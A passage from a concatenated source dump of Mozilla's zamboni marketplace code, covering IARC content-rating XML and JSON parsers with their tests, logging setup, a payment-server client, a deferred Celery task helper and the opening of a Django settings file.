assert '<FIELD NAME="security_code" VALUE="AB12CD3"' in xml
assert '<FIELD NAME="platform" VALUE="Firefox"' in xml
# If these aren't specified in the context they aren't included.
assert not '<FIELD NAME="title"' in xml
class TestRenderSetStorefrontData(amo.tests.TestCase):
def setUp(self):
self.template = 'set_storefront_data.xml'
@override_settings(IARC_PASSWORD='s3kr3t',
IARC_PLATFORM='Firefox')
def test_render(self):
xml = render_xml(self.template, {
'submission_id': 100,
'security_code': 'AB12CD3',
'rating_system': 'PEGI',
'release_date': datetime.date(2013, 11, 1),
'title': 'Twitter',
'company': 'Test User',
'rating': '16+',
'descriptors': u'N\xc3\xa3o h\xc3\xa1 inadequa\xc3\xa7\xc3\xb5es',
'interactive_elements': 'users interact'})
assert xml.startswith('<?xml version="1.0" encoding="utf-8"?>')
assert '<FIELD NAME="password" VALUE="s3kr3t"' in xml
assert '<FIELD NAME="storefront_company" VALUE="Test User"' in xml
assert '<FIELD NAME="platform" VALUE="Firefox"' in xml
assert '<FIELD NAME="submission_id" VALUE="100"' in xml
assert '<FIELD NAME="security_code" VALUE="AB12CD3"' in xml
assert '<FIELD NAME="rating_system" VALUE="PEGI"' in xml
assert '<FIELD NAME="release_date" VALUE="2013-11-01"' in xml
assert '<FIELD NAME="storefront_title" VALUE="Twitter"' in xml
assert '<FIELD NAME="storefront_rating" VALUE="16+"' in xml
assert ('<FIELD NAME="storefront_descriptors" '
u'VALUE="N\xc3\xa3o h\xc3\xa1 inadequa\xc3\xa7\xc3\xb5es"'
in xml)
assert ('<FIELD NAME="storefront_interactive_elements" '
'VALUE="users interact"') in xml
# The client base64 encodes these. Mimic what the client does here to
# ensure no unicode problems.
base64.b64encode(xml.encode('utf-8'))
class TestRenderRatingChanges(amo.tests.TestCase):
def setUp(self):
self.template = 'get_rating_changes.xml'
@override_settings(IARC_PASSWORD='s3kr3t')
def test_render(self):
xml = render_xml(self.template, {
'date_from': datetime.date(2011, 1, 1),
'date_to': datetime.date(2011, 2, 1)})
assert xml.startswith('<?xml version="1.0" encoding="utf-8"?>')
assert '<FIELD NAME="password" VALUE="s3kr3t"' in xml
assert '<FIELD NAME="date_from" VALUE="2011-01-01"' in xml
assert '<FIELD NAME="date_to" VALUE="2011-02-01"' in xml
class TestXMLParser(amo.tests.TestCase):
def setUp(self):
self.client = get_iarc_client('service')
def test_missing_value(self):
"""Sometimes the VALUE attribute in the XML is missing."""
xml = '''<?xml version="1.0" encoding="utf-16"?>
<WEBSERVICE SERVICE_NAME="SET_STOREFRONT_DATA" TYPE="REQUEST">
<ROW>
<FIELD NAME="rating_PEGI" TYPE="string" VALUE="16+" />
<FIELD NAME="descriptors_PEGI" TYPE="string" />
</ROW>
</WEBSERVICE>'''
data = IARC_XML_Parser().parse_string(xml)
assert 'ratings' in data['rows'][0]
assert 'descriptors' not in data['rows'][0]
def test_app_info(self):
xml = self.client.Get_App_Info(XMLString='foo')
data = IARC_XML_Parser().parse_string(xml)['rows'][0]
eq_(data['submission_id'], 52)
eq_(data['title'], 'Twitter')
eq_(data['company'], 'Mozilla')
eq_(data['storefront'], 'Mozilla')
eq_(data['platform'], 'Firefox')
# Test ratings get mapped to their appropriate rating classes.
eq_(data['ratings'][ratingsbodies.ESRB], ratingsbodies.ESRB_M)
eq_(data['ratings'][ratingsbodies.USK], ratingsbodies.USK_REJECTED)
eq_(data['ratings'][ratingsbodies.CLASSIND], ratingsbodies.CLASSIND_14)
eq_(data['ratings'][ratingsbodies.PEGI], ratingsbodies.PEGI_16)
eq_(data['ratings'][ratingsbodies.GENERIC], ratingsbodies.GENERIC_16)
# Test descriptors.
self.assertSetEqual(data['descriptors'],
['has_usk_lang',
'has_esrb_strong_lang',
'has_classind_sex_content', 'has_classind_lang',
'has_pegi_lang', 'has_pegi_online'])
# Test interactives.
self.assertSetEqual(data['interactives'],
['has_shares_info', 'has_shares_location',
'has_digital_purchases', 'has_users_interact'])
def test_rating_changes(self):
xml = self.client.Get_Rating_Changes(XMLString='foo')
data = IARC_XML_Parser().parse_string(xml)
eq_(len(data['rows']), 2)
row = data['rows'][0]
eq_(row['rowId'], 1)
eq_(row['submission_id'], 52)
eq_(row['title'], 'Twitter')
eq_(row['company'], 'Mozilla')
eq_(row['change_date'], '11/12/2013')
eq_(row['security_code'], 'FZ32CU8')
eq_(row['email'], '[email protected]')
eq_(row['rating_system'], ratingsbodies.CLASSIND)
eq_(row['new_rating'], '18+')
eq_(row['new_descriptors'],
u'Conte\xfado Impactante, Cont\xe9udo Sexual, Drogas, Linguagem '
u'Impr\xf3pria, Nudez, Viol\xeancia Extrema')
eq_(row['change_reason'],
'Significant issues found in special mission cut scenes.')
row = data['rows'][1]
eq_(row['rowId'], 2)
eq_(row['submission_id'], 68)
eq_(row['title'], 'Other App')
eq_(row['company'], 'Mozilla')
eq_(row['change_date'], '11/12/2013')
eq_(row['security_code'], 'GZ32CU8')
eq_(row['email'], '[email protected]')
eq_(row['new_rating'], '12+')
eq_(row['new_descriptors'], 'Gewalt')
eq_(row['rating_system'], ratingsbodies.USK)
eq_(row['change_reason'],
'Discrimination found to be within German law.')
########NEW FILE########
__FILENAME__ = utils
import os
import StringIO
from django.conf import settings
from jinja2 import Environment, FileSystemLoader
from rest_framework.compat import etree, six
from rest_framework.exceptions import ParseError
from rest_framework.parsers import JSONParser, XMLParser
import amo.utils
from amo.helpers import strip_controls
from mkt.constants import ratingsbodies
root = os.path.join(settings.ROOT, 'lib', 'iarc')
env = Environment(loader=FileSystemLoader(os.path.join(root, 'templates')))
env.finalize = lambda x: strip_controls(x)
def render_xml(template, context):
"""
Renders an XML template given a dict of the context.
This also strips control characters before encoding.
"""
# All XML passed requires a password. Let's add it to the context.
context['password'] = settings.IARC_PASSWORD
context['platform'] = settings.IARC_PLATFORM
template = env.get_template(template)
return template.render(context)
def get_iarc_app_title(app):
"""Delocalized app name."""
from mkt.webapps.models import Webapp
with amo.utils.no_translation(app.default_locale):
delocalized_app = Webapp.with_deleted.get(pk=app.pk)
return unicode(delocalized_app.name)
class IARC_Parser(object):
"""
Base class for IARC XML and JSON parsers.
"""
def _process_iarc_items(self, data):
"""
Looks for IARC keys ('interactive_elements' or keys starting with
'rating_' or 'descriptors_') and trades them for a 'ratings' dictionary
or descriptor and interactive lists.
"""
rows = [] # New data object we'll return.
for row in data:
d = {}
ratings = {}
descriptors = []
interactives = []
for k, v in row.items():
# Get ratings body constant.
ratings_body = RATINGS_BODY_MAPPING.get(
k.split('_')[-1].lower(), ratingsbodies.GENERIC)
if k == 'rating_system':
# This key is used in the Get_Rating_Changes API.
d[k] = RATINGS_BODY_MAPPING.get(v.lower(),
ratingsbodies.GENERIC)
elif k == 'interactive_elements':
interactives = [INTERACTIVES_MAPPING[s] for s in
filter(None, [s.strip()
for s in v.split(',')])]
elif k.startswith('rating_'):
ratings[ratings_body] = RATINGS_MAPPING[ratings_body].get(
v, RATINGS_MAPPING[ratings_body]['default'])
elif k.startswith('descriptors_'):
native_descs = filter(None,
[s.strip() for s in v.split(',')])
descriptors.extend(
filter(None, [DESC_MAPPING[ratings_body].get(desc)
for desc in native_descs]))
else:
d[k] = v
if ratings:
d['ratings'] = ratings
if descriptors:
d['descriptors'] = descriptors
if interactives:
d['interactives'] = interactives
rows.append(d)
return rows
class IARC_XML_Parser(XMLParser, IARC_Parser):
"""
Custom XML processor for IARC whack XML that defines all content in XML
attributes with no tag content and all tags are named the same. This builds
a dict using the "NAME" and "VALUE" attributes.
"""
# TODO: Remove this `parse` method once this PR is merged and released:
# https://github.com/tomchristie/django-rest-framework/pull/1211
def parse(self, stream, media_type=None, parser_context=None):
"""
Parses the incoming bytestream as XML and returns the resulting data.
"""
assert etree, 'XMLParser requires defusedxml to be installed'
parser_context = parser_context or {}
encoding = parser_context.get('encoding', settings.DEFAULT_CHARSET)
parser = etree.DefusedXMLParser(encoding=encoding)
try:
tree = etree.parse(stream, parser=parser, forbid_dtd=True)
except (etree.ParseError, ValueError) as exc:
raise ParseError('XML parse error - %s' % six.text_type(exc))
data = self._xml_convert(tree.getroot())
# Process ratings, descriptors, interactives.
data = self._process_iarc_items(data)
# If it's a list, it had one or more "ROW" tags.
if isinstance(data, list):
data = {'rows': data}
return data
def parse_string(self, string):
# WARNING: Ugly hack.
#
# IARC XML is utf-8 encoded yet the XML has a utf-16 header. Python
# correctly reports the encoding mismatch and raises an error. So we
# replace it here to make things work.
string = string.replace('encoding="utf-16"', 'encoding="utf-8"')
return self.parse(StringIO.StringIO(string))
def _xml_convert(self, element):
"""
Convert the xml `element` into the corresponding Python object.
"""
children = list(element)
if len(children) == 0:
return self._type_convert(element.get('VALUE', ''))
else:
if children[0].tag == 'ROW':
data = []
for child in children:
data.append(self._xml_convert(child))
else:
data = {}
for child in children:
data[child.get('NAME',
child.tag)] = self._xml_convert(child)
return data
class IARC_JSON_Parser(JSONParser, IARC_Parser):
"""
JSON Parser to handle IARC's JSON format.
"""
def parse(self, stream, media_type=None, parser_context=None):
data = super(IARC_JSON_Parser, self).parse(stream, media_type,
parser_context)
data = self._convert(data)
data = self._process_iarc_items(data)
return data
def _convert(self, data):
"""
Converts JSON that looks like::
{
"NAME": "token",
"TYPE": "string",
"VALUE": "AB12CD3"
}
Into something more normal that looks like this::
{
"token": "AB12CD3"
}
"""
d = {}
for f in data['ROW']['FIELD']:
d[f['NAME']] = f['VALUE']
# Return a list to match the parsed XML.
return [d]
# These mappings are required to convert the IARC response strings, like "ESRB"
# to the ratings body constants in mkt/constants/ratingsbodies. Likewise for
# the descriptors.
RATINGS_BODY_MAPPING = {
'classind': ratingsbodies.CLASSIND,
'esrb': ratingsbodies.ESRB,
'generic': ratingsbodies.GENERIC,
'pegi': ratingsbodies.PEGI,
'usk': ratingsbodies.USK,
'default': ratingsbodies.GENERIC,
}
RATINGS_MAPPING = {
ratingsbodies.CLASSIND: {
'Livre': ratingsbodies.CLASSIND_L,
'10+': ratingsbodies.CLASSIND_10,
'12+': ratingsbodies.CLASSIND_12,
'14+': ratingsbodies.CLASSIND_14,
'16+': ratingsbodies.CLASSIND_16,
'18+': ratingsbodies.CLASSIND_18,
'default': ratingsbodies.CLASSIND_L,
},
ratingsbodies.ESRB: {
'Everyone': ratingsbodies.ESRB_E,
'Everyone 10+': ratingsbodies.ESRB_10,
'Teen': ratingsbodies.ESRB_T,
'Mature 17+': ratingsbodies.ESRB_M,
'Adults Only': ratingsbodies.ESRB_A,
'default': ratingsbodies.ESRB_E,
},
ratingsbodies.GENERIC: {
'3+': ratingsbodies.GENERIC_3,
'7+': ratingsbodies.GENERIC_7,
'12+': ratingsbodies.GENERIC_12,
'16+': ratingsbodies.GENERIC_16,
'18+': ratingsbodies.GENERIC_18,
'RP': ratingsbodies.GENERIC_RP,
'default': ratingsbodies.GENERIC_3,
},
ratingsbodies.PEGI: {
'3+': ratingsbodies.PEGI_3,
'7+': ratingsbodies.PEGI_7,
'12+': ratingsbodies.PEGI_12,
'16+': ratingsbodies.PEGI_16,
'18+': ratingsbodies.PEGI_18,
'default': ratingsbodies.PEGI_3,
},
ratingsbodies.USK: {
'0+': ratingsbodies.USK_0,
'6+': ratingsbodies.USK_6,
'12+': ratingsbodies.USK_12,
'16+': ratingsbodies.USK_16,
'18+': ratingsbodies.USK_18,
'Rating Refused': ratingsbodies.USK_REJECTED,
'default': ratingsbodies.USK_0,
},
}
DESC_MAPPING = {
# All values will be prepended with 'has_%s_' % RATINGS_BODY later.
ratingsbodies.CLASSIND: {
u'Atos Crim\xEDnosos': 'criminal_acts',
u'Cont\xE9udo Sexual': 'sex_content',
u'Conte\xFAdo Impactante': 'shocking',
u'Drogas Il\xEDcitas': 'drugs_illegal',
u'Drogas L\xEDcitas': 'drugs_legal',
u'Drogas': 'drugs',
u'Linguagem Impr\xF3pria': 'lang',
u'Nudez': 'nudity',
u'Sexo': 'sex',
u'Sexo Expl\xEDcito': 'sex_explicit',
u'Viol\xEAncia Extrema': 'violence_extreme',
u'Viol\xEAncia': 'violence',
},
ratingsbodies.ESRB: {
u'Alcohol and Tobacco Reference': 'alcohol_tobacco_ref',
u'Alcohol Reference': 'alcohol_ref',
u'Blood and Gore': 'blood_gore',
u'Blood': 'blood',
u'Comic Mischief': 'comic_mischief',
u'Crime': 'crime',
u'Criminal Instruction': 'crime_instruct',
u'Crude Humor': 'crude_humor',
u'Drug and Alcohol Reference': 'drug_alcohol_ref',
u'Drug and Tobacco Reference': 'drug_tobacco_ref',
u'Drug Reference': 'drug_ref',
u'Drug, Alcohol and Tobacco Reference': 'drug_alcohol_tobacco_ref',
u'Fantasy Violence': 'fantasy_violence',
u'Hate Speech': 'hate_speech',
u'Intense Violence': 'intense_violence',
u'Language': 'lang',
u'Mild Blood': 'mild_blood',
u'Mild Fantasy Violence': 'mild_fantasy_violence',
u'Mild Language': 'mild_lang',
u'Mild Violence': 'mild_violence',
u'Nudity': 'nudity',
u'Partial Nudity': 'partial_nudity',
u'Real Gambling': 'real_gambling',
u'Scary Themes': 'scary',
u'Sexual Content': 'sex_content',
u'Sexual Themes': 'sex_themes',
u'Simulated Gambling': 'sim_gambling',
u'Strong Language': 'strong_lang',
u'Strong Sexual Content': 'strong_sex_content',
u'Suggestive Themes': 'suggestive',
u'Tobacco Reference': 'tobacco_ref',
u'Use of Alcohol and Tobacco': 'alcohol_tobacco_use',
u'Use of Alcohol': 'alcohol_use',
u'Use of Drug and Alcohol': 'drug_alcohol_use',
u'Use of Drug and Tobacco': 'drug_tobacco_use',
u'Use of Drug, Alcohol and Tobacco': 'drug_alcohol_tobacco_use',
u'Use of Drugs': 'drug_use',
u'Use of Tobacco': 'tobacco_use',
u'Violence': 'violence',
u'Violent References': 'violence_ref',
},
ratingsbodies.GENERIC: {
u'Discrimination': 'discrimination',
u'Drugs': 'drugs',
u'Fear': 'scary',
u'Gambling': 'gambling',
u'Language': 'lang',
u'Online': 'online',
u'Sex': 'sex_content',
u'Violence': 'violence',
},
ratingsbodies.PEGI: {
u'Discrimination': 'discrimination',
u'Drugs': 'drugs',
u'Fear': 'scary',
u'Gambling': 'gambling',
u'Language': 'lang',
u'Online': 'online',
u'Sex': 'sex_content',
u'Violence': 'violence',
# PEGI's versions of Interactive Elements.
u'In-app purchase option': 'digital_purchases',
u'Location data sharing': 'shares_location',
u'Personal data sharing': 'shares_info',
u'Social interaction functionality': 'users_interact',
},
ratingsbodies.USK: {
u'Alkoholkonsum': 'alcohol',
u'Abstrakte Gewalt': 'abstract_violence',
u'Andeutungen Sexueller Gewalt': 'sex_violence_ref',
u'\xC4ngstigende Inhalte': 'scary',
u'Diskriminierung': 'discrimination',
u'Drogen': 'drugs',
u'Drogenkonsum': 'drug_use',
u'Erotik/Sexuelle Inhalte': 'sex_content',
u'Explizite Sprache': 'lang',
u'Explizite Gewalt': 'explicit_violence',
u'Gelegentliches Fluchen': 'some_swearing',
u'Gewalt': 'violence',
u'Grusel/Horror': 'horror',
u'Nacktheit/Erotik': 'nudity',
u'Seltene Schreckmomente': 'some_scares',
u'Sexuelle Gewalt': 'sex_violence',
u'Sexuelle Andeutungen': 'sex_ref',
u'Tabakkonsum': 'tobacco',
},
}
# Expand the mapping key names (e.g. 'blood' to 'has_esrb_blood').
for body, mappings in DESC_MAPPING.items():
for native_desc, desc_slug in mappings.items():
DESC_MAPPING[body][native_desc] = 'has_{0}_{1}'.format(
body.iarc_name, desc_slug).lower()
# Change {body: {'key': 'val'}} to {'val': 'key'}.
REVERSE_DESC_MAPPING_BY_BODY = (
dict([(unicode(v), unicode(k)) for k, v in body_mapping.iteritems()])
for body, body_mapping in DESC_MAPPING.iteritems())
REVERSE_DESC_MAPPING = {}
for mapping in REVERSE_DESC_MAPPING_BY_BODY:
REVERSE_DESC_MAPPING.update(mapping)
INTERACTIVES_MAPPING = {
'Users Interact': 'has_users_interact',
'Shares Info': 'has_shares_info',
'Shares Location': 'has_shares_location',
'Digital Purchases': 'has_digital_purchases',
}
REVERSE_INTERACTIVES_MAPPING = dict(
(v, k) for k, v in INTERACTIVES_MAPPING.iteritems())
########NEW FILE########
__FILENAME__ = log_settings_base
import logging
import logging.handlers
from django.conf import settings
from raven.contrib.django.handlers import SentryHandler
import commonware.log
import dictconfig
base_fmt = ('%(name)s:%(levelname)s %(message)s '
':%(pathname)s:%(lineno)s')
error_fmt = ('%(name)s:%(levelname)s %(request_path)s %(message)s '
':%(pathname)s:%(lineno)s')
formatters = {
'debug': {
'()': commonware.log.Formatter,
'datefmt': '%H:%M:%S',
'format': '%(asctime)s ' + base_fmt,
},
'prod': {
'()': commonware.log.Formatter,
'datefmt': '%H:%M:%S',
'format': ('%s %s: [%%(USERNAME)s][%%(REMOTE_ADDR)s] %s'
% (settings.HOSTNAME, settings.SYSLOG_TAG, base_fmt)),
},
'prod2': {
'()': commonware.log.Formatter,
'datefmt': '%H:%M:%S',
'format': ('%s %s: [%%(USERNAME)s][%%(REMOTE_ADDR)s] %s'
% (settings.HOSTNAME, settings.SYSLOG_TAG2, base_fmt)),
},
'error': {
'()': commonware.log.Formatter,
'datefmt': '%H:%M:%S',
'format': ('%s %s: [%%(USERNAME)s][%%(REMOTE_ADDR)s] %s'
% (settings.HOSTNAME, settings.SYSLOG_TAG, error_fmt)),
},
}
handlers = {
'console': {
'()': logging.StreamHandler,
'formatter': 'debug',
},
'syslog': {
'class': 'mozilla_logger.log.UnicodeHandler',
'facility': logging.handlers.SysLogHandler.LOG_LOCAL7,
'formatter': 'prod',
},
'syslog2': {
'class': 'mozilla_logger.log.UnicodeHandler',
'facility': logging.handlers.SysLogHandler.LOG_LOCAL7,
'formatter': 'prod2',
},
'null': {
'class': 'lib.misc.admin_log.NullHandler',
},
'statsd': {
'level': 'ERROR',
'class': 'django_statsd.loggers.errors.StatsdHandler',
},
}
loggers = {
'z': {},
'django.request': {
'handlers': ['statsd'],
'level': 'ERROR',
'propagate': True,
},
'z.celery': {
'handlers': ['statsd'],
'level': 'ERROR',
'propagate': True,
},
'caching': {
'level': 'ERROR',
},
'newrelic': {
'level': 'WARNING',
},
'elasticutils': {
'level': 'WARNING',
},
'suds': {
'level': 'ERROR',
'propagate': True
},
}
cfg = {
'version': 1,
'filters': {},
'formatters': formatters,
'handlers': handlers,
'loggers': loggers,
'root': {},
}
def log_configure():
"""You have to explicitly call this to configure logging."""
for key, value in settings.LOGGING.items():
if isinstance(cfg[key], dict):
cfg[key].update(value)
else:
cfg[key] = value
USE_SYSLOG = settings.HAS_SYSLOG and not settings.DEBUG
if USE_SYSLOG:
cfg['loggers']['z.timer'] = {'handlers': ['syslog2']}
# Set the level and handlers for all loggers.
for logger in cfg['loggers'].values() + [cfg['root']]:
if 'handlers' not in logger:
logger['handlers'] = ['syslog' if USE_SYSLOG else 'console']
if 'level' not in logger:
logger['level'] = settings.LOG_LEVEL
if logger is not cfg['root'] and 'propagate' not in logger:
logger['propagate'] = False
dictconfig.dictConfig(cfg)
########NEW FILE########
__FILENAME__ = test
# -*- coding: utf8 -*-
import mock
import amo.tests
from lib.metrics import record_action
class TestMetrics(amo.tests.TestCase):
@mock.patch('lib.metrics.record_stat')
def test_record_action(self, record_stat):
request = mock.Mock()
request.GET = {'src': 'foo'}
request.LANG = 'en'
request.META = {'HTTP_USER_AGENT': 'py'}
record_action('install', request, {})
record_stat.assert_called_with('install', request,
**{'locale': 'en', 'src': 'foo', 'user-agent': 'py'})
########NEW FILE########
__FILENAME__ = admin_log
import logging
getLogger = logging.getLogger
# This can be removed when we go to Python 2.7.
class NullHandler(logging.Handler):
def emit(self, record):
pass
# Ensure the creation of the Django logger
# with a null handler. This ensures we don't get any
# 'No handlers could be found for logger "django"' messages
logger = getLogger('django')
if not logger.handlers:
logger.addHandler(NullHandler())
########NEW FILE########
__FILENAME__ = test_log
import logging
from django.conf import settings
from nose.tools import eq_
from heka.config import client_from_dict_config
import amo.tests
import commonware.log
from lib.log_settings_base import error_fmt
cfg = {
'version': 1,
'formatters': {
'error': {
'()': commonware.log.Formatter,
'datefmt': '%H:%M:%S',
'format': ('%s: [%%(USERNAME)s][%%(REMOTE_ADDR)s] %s'
% (settings.SYSLOG_TAG, error_fmt)),
},
},
'handlers': {
'test_syslog': {
'class': 'lib.misc.admin_log.ErrorSyslogHandler',
'formatter': 'error',
},
},
'loggers': {
'test.lib.misc.logging': {
'handlers': ['test_syslog'],
'level': 'ERROR',
'propagate': False,
},
},
}
class TestHekaStdLibLogging(amo.tests.TestCase):
"""
The StdLibLoggingStream is only used for *debugging* purposes.
Some detail is lost when you write out to a StdLibLoggingStream -
specifically the logging level.
"""
def setUp(self):
HEKA_CONF = {
'encoder': 'heka.encoders.StdlibPayloadEncoder',
'stream': {
'class': 'heka.streams.logging.StdLibLoggingStream',
'logger_name': 'z.heka',
}
}
self.heka = client_from_dict_config(HEKA_CONF)
self.logger = logging.getLogger('z.heka')
"""
When logging.config.dictConfig is used to configure logging
with a 'one-shot' config dictionary, any previously
instantiated singleton loggers (ie: all old loggers not in
the new config) will be explicitly disabled.
"""
self.logger.disabled = False
self._orig_handlers = self.logger.handlers
self.handler = logging.handlers.BufferingHandler(65536)
self.logger.handlers = [self.handler]
def tearDown(self):
self.logger.handlers = self._orig_handlers
def test_oldstyle_sends_msg(self):
msg = 'an error'
self.heka.error(msg)
logrecord = self.handler.buffer[-1]
self.assertEqual(logrecord.msg, "oldstyle: %s" % msg)
eq_(logrecord.levelno, logging.ERROR)
msg = 'info'
self.heka.info(msg)
logrecord = self.handler.buffer[-1]
self.assertEqual(logrecord.msg, "oldstyle: %s" % msg)
self.assertEqual(logrecord.levelname, 'INFO')
msg = 'warn'
self.heka.warn(msg)
logrecord = self.handler.buffer[-1]
eq_(logrecord.msg, "oldstyle: %s" % msg)
eq_(logrecord.levelno, logging.WARN)
# debug shouldn't log
eq_(logrecord, self.handler.buffer[-1])
def test_other_sends_json(self):
timer = 'footimer'
elapsed = 4
self.heka.timer_send(timer, elapsed)
logrecord = self.handler.buffer[-1]
# Note that the face that this is a timer is lost entirely
eq_(logrecord.levelno, logging.INFO)
eq_(logrecord.msg, "timer: %s" % str(elapsed))
class TestRaven(amo.tests.TestCase):
def setUp(self):
"""
We need to set the settings.HEKA instance to use a
DebugCaptureStream so that we can inspect the sent messages.
"""
heka = settings.HEKA
HEKA_CONF = {
'logger': 'zamboni',
'stream': {'class': 'heka.streams.DebugCaptureStream'},
'encoder': 'heka.encoders.NullEncoder'
}
from heka.config import client_from_dict_config
self.heka = client_from_dict_config(HEKA_CONF, heka)
def test_send_raven(self):
try:
1 / 0
except:
self.heka.raven('blah')
eq_(len(self.heka.stream.msgs), 1)
msg = self.heka.stream.msgs[0]
eq_(msg.type, 'sentry')
########NEW FILE########
__FILENAME__ = urlconf_decorator
"""
Apply a decorator to a whole urlconf instead of a single view function.
Usage::
>>> from urlconf_decorator import decorate
>>>
>>> def dec(f):
... def wrapper(*args, **kw):
... print 'inside the decorator'
... return f(*args, **kw)
... return wrapper
>>>
>>> urlpatterns = patterns(''
... url('^admin/', decorate(dec, include(admin.site.urls))),
... )
The decorator applied to the urlconf is a normal function decorator. It gets
wrapped around each callback in the urlconf as if you had @decorator above the
function.
"""
from django.core.urlresolvers import RegexURLResolver, RegexURLPattern
def decorate(decorator, urlconf):
if isinstance(urlconf, (list, tuple)):
for item in urlconf:
decorate(decorator, item)
elif isinstance(urlconf, RegexURLResolver):
for item in urlconf.url_patterns:
decorate(decorator, item)
elif isinstance(urlconf, RegexURLPattern):
urlconf._callback = decorator(urlconf.callback)
return urlconf
########NEW FILE########
__FILENAME__ = base
import datetime
import decimal
import json
import logging
import urllib
from django.conf import settings
from curling.lib import API
from tower import ugettext_lazy as _
log = logging.getLogger('s.client')
class SolitudeError(Exception):
def __init__(self, *args, **kwargs):
self.code = kwargs.pop('code', 0)
super(SolitudeError, self).__init__(*args, **kwargs)
class SolitudeOffline(SolitudeError):
pass
class SolitudeTimeout(SolitudeError):
pass
date_format = '%Y-%m-%d'
time_format = '%H:%M:%S'
class Encoder(json.JSONEncoder):
ENCODINGS = {
datetime.datetime:
lambda v: v.strftime('%s %s' % (date_format, time_format)),
datetime.date: lambda v: v.strftime(date_format),
datetime.time: lambda v: v.strftime(time_format),
decimal.Decimal: str,
}
def default(self, v):
"""Encode some of our basic types in ways solitude understands."""
return self.ENCODINGS.get(type(v), super(Encoder, self).default)(v)
general_error = _('Oops, we had an error processing that.')
class Client(object):
def __init__(self, config=None):
self.config = self.parse(config)
self.api = API(config['server'])
self.api.activate_oauth(settings.SOLITUDE_OAUTH.get('key'),
settings.SOLITUDE_OAUTH.get('secret'))
self.encoder = None
self.filter_encoder = urllib.urlencode
def parse(self, config=None):
return {'server': config.get('server')}
########NEW FILE########
__FILENAME__ = test
import datetime
import json
from django.conf import settings
import test_utils
from mock import patch
from nose.tools import eq_
from addons.models import Addon
import amo
from users.models import UserProfile
from lib.pay_server import filter_encoder, model_to_uid, ZamboniEncoder
@patch.object(settings, 'SOLITUDE_HOSTS', ('http://localhost'))
@patch.object(settings, 'DOMAIN', 'testy')
class TestUtils(test_utils.TestCase):
def setUp(self):
self.user = UserProfile.objects.create()
self.addon = Addon.objects.create(type=amo.ADDON_WEBAPP)
def test_uid(self):
eq_(model_to_uid(self.user), 'testy:users:%s' % self.user.pk)
def test_encoder(self):
today = datetime.date.today()
res = json.loads(json.dumps({'uuid': self.user, 'date': today},
cls=ZamboniEncoder))
eq_(res['uuid'], 'testy:users:%s' % self.user.pk)
eq_(res['date'], today.strftime('%Y-%m-%d'))
def test_filter_encoder(self):
eq_(filter_encoder({'uuid': self.user, 'bar': 'bar'}),
'bar=bar&uuid=testy%%3Ausers%%3A%s' % self.user.pk)
########NEW FILE########
__FILENAME__ = task
import threading
from functools import partial
from django.core.signals import got_request_exception, request_finished
import commonware.log
from celery import task as base_task
from celery import Task
log = commonware.log.getLogger('z.post_request_task')
_locals = threading.local()
def _get_task_queue():
"""Returns the calling thread's task queue."""
return _locals.__dict__.setdefault('task_queue', [])
def _send_tasks(**kwargs):
"""Sends all delayed Celery tasks."""
queue = _get_task_queue()
while queue:
cls, args, kwargs = queue.pop(0)
cls.original_apply_async(*args, **kwargs)
def _discard_tasks(**kwargs):
"""Discards all delayed Celery tasks."""
_get_task_queue()[:] = []
def _append_task(t):
"""Append a task to the queue.
Expected argument is a tuple of the (task class, args, kwargs).
This doesn't append to queue if the argument is already in the queue.
"""
queue = _get_task_queue()
if t not in queue:
queue.append(t)
else:
log.debug('Removed duplicate task: %s' % (t,))
class PostRequestTask(Task):
"""A task whose execution is delayed until after the request finishes.
This simply wraps celery's `@task` decorator and stores the task calls
until after the request is finished, then fires them off.
"""
abstract = True
def original_apply_async(self, *args, **kwargs):
return super(PostRequestTask, self).apply_async(*args, **kwargs)
def apply_async(self, *args, **kwargs):
_append_task((self, args, kwargs))
# Replacement `@task` decorator.
task = partial(base_task, base=PostRequestTask)
# Hook the signal handlers up.
request_finished.connect(_send_tasks)
got_request_exception.connect(_discard_tasks)
########NEW FILE########
__FILENAME__ = tests
from django.core.signals import request_finished
from django.test import TestCase
from mock import Mock, patch
from nose.tools import eq_
from .task import task, _get_task_queue, _discard_tasks
task_mock = Mock()
@task
def test_task():
task_mock()
class TestTask(TestCase):
def tearDown(self):
task_mock.reset_mock()
_discard_tasks()
def _verify_task_filled(self):
queue = _get_task_queue()
size = len(queue)
eq_(size, 1, 'Expected 1 task in the queue, found %d' % size)
cls, args, kwargs = queue[0]
eq_(cls.name,
'%s.%s' % (test_task.__module__, test_task.__name__),
'Expected the test task, found %s' % cls.name)
def _verify_task_empty(self):
assert len(_get_task_queue()) == 0
def test_task(self):
test_task.delay()
assert not task_mock.called
@patch('lib.post_request_task.task.PostRequestTask.original_apply_async')
def test_request_finished(self, _mock):
with self.settings(CELERY_ALWAYS_EAGER=False):
test_task.delay()
self._verify_task_filled()
request_finished.send(sender=self)
self._verify_task_empty()
# Assert the original `apply_async` called.
assert _mock.called
@patch('lib.post_request_task.task.PostRequestTask.original_apply_async')
def test_request_failed(self, _mock):
with self.settings(CELERY_ALWAYS_EAGER=False):
test_task.delay()
self._verify_task_filled()
# Simulate a request exception.
_discard_tasks()
self._verify_task_empty()
# Assert the original `apply_async` was not called.
assert not _mock.called
def test_deduplication(self):
"""Test the same task added multiple times is de-duped."""
with self.settings(CELERY_ALWAYS_EAGER=False):
test_task.delay()
test_task.delay()
self._verify_task_filled()
########NEW FILE########
__FILENAME__ = settings_base
# -*- coding: utf-8 -*-
# Django settings for zamboni project.
import logging
import os
import socket
from django.utils.functional import lazy
from heka.config import client_from_dict_config
ALLOWED_HOSTS = [
'.allizom.org',
'.mozilla.org',
'.mozilla.com',
'.mozilla.net',
]
# jingo-minify settings
CACHEBUST_IMGS = True
try:
# If we have build ids available, we'll grab them here and add them to our
# CACHE_PREFIX. This will let us not have to flush memcache during updates
# and it will let us preload data into it before a production push.
from build import BUILD_ID_CSS, BUILD_ID_JS
build_id = "%s%s" % (BUILD_ID_CSS[:2], BUILD_ID_JS[:2])
except ImportError:
build_id = ""
# jingo-minify: Style sheet media attribute default
CSS_MEDIA_DEFAULT = 'all'
# Make filepaths relative to the root of zamboni.
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
path = lambda *a: os.path.join(ROOT, *a)
# We need to track this because hudson can't just call its checkout "zamboni".
# It puts it in a dir called "workspace". Way to be, hudson.
ROOT_PACKAGE = os.path.basename(ROOT)
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DEBUG_PROPAGATE_EXCEPTIONS = True
# need to view JS errors on a remote device? (requires node)
# > npm install now
# > node media/js/debug/remote_debug_server.node.js
# REMOTE_JS_DEBUG = 'localhost:37767'
